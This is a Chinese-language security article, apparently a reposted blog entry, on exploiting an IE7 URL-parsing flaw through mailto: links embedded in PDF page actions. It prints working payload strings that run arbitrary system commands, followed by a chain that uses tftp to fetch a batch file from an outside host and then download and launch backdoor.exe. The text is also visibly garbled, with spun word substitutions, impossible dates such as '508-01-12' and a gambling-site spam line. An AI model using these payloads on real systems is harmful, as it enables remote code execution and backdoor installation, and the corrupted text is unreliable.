URL解析漏洞在PDF文档中的利用

  • 时间:
  • 浏览:2
  • 来源:极速5分PK10下注平台_极速5分PK10注册平台_极速5分PK10官网平台





作者: 论坛派发 zdnet网络安全

CNETNews.com.cn

508-01-12 15:26:37

关键词: 网络安全 漏洞扫描 漏洞

右键另存再打开测试文档,已经 会调用IE的插件打开,测试会失败。机会你硬要通过点击打开励志的话 ,点击这里吧,嘿嘿,这并有的是也是IE的有有另兩个 解析漏洞。

http://seclists.org/fulldisclosure/507/Oct/0068.html看过你这一漏洞的以前,一时还没人想到为什么会么会么利用。已经 结合去年有有另另兩个 关于pdf actions安全隐患的没人有有另兩个 问題(参看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打开页面的事件刚好还不到用来利用。

Petko Petkov以前放出话说pdf的0day应该也可是我指的是你这一漏洞了。利用你这一漏洞首先不到安装IE7,在URL解析时遇到百分号(%)会执行上边的守护tcp连接。放出来的利用妙招 为:

以下是代码片段:
mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".

利用你这一URL咱们还不到执行系统中的任意命令了,已经 有你这一用处的系统命令都得加参数才能用啊。为什么会么会么加入参数呢?反正装入 .cmd前就行,已经 不到装入 引号(")上边,呵呵,虽然没的选。经过测试,下面的励志的话 就ok了:

以下是代码片段:
mailto:test%../../../../windows/system32/net.exe" “user”.cmd

要有多个参数励志的话 就的

以下是代码片段:
mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd

到这里,基本上亲们也有的是 了利用妙招 了,网络COPY命令,TFTP等都行啊。不过得分两步:

1.下载守护tcp连接

2.执行守护tcp连接

还有你这一要注意的,最好在打开页面事件和关闭页面时间中加入上边两步,以免机会网速问題造成守护tcp连接执行不成功。

以下是代码片段:
mailto:test%........windowssystem32	ftp.exe" "-i" "zwell.3322.org"
"GET" "a.bat" "c:a".cmd
mailto:test%........windowssystem32cmd.exe" "/c c:a".cmd

在zwell.3322.org上我搭建了有有另兩个 TFTP服务器,上边放有有另另兩个 a.cmd,内容可是我再去下载执行有有另兩个 守护tcp连接。

在pdf打开首页时执行第第一根指令,下载服务器上的a.bat,保存为a.cmd(为哪几个是cmd,亲们还不到思考一下)。

在拖累该页面时,再执行机会下载的a.cmd,虽然他是个bat文件,内容是:

以下是代码片段:
cmd /c tftp -i zwell.3322.org GET backdoor.exe c:.exe
start c:.exe

好了,现在下载了backdoor.exe守护tcp连接(这可是我有有另兩个 notepad守护tcp连接,我重命名了)已经 执行了。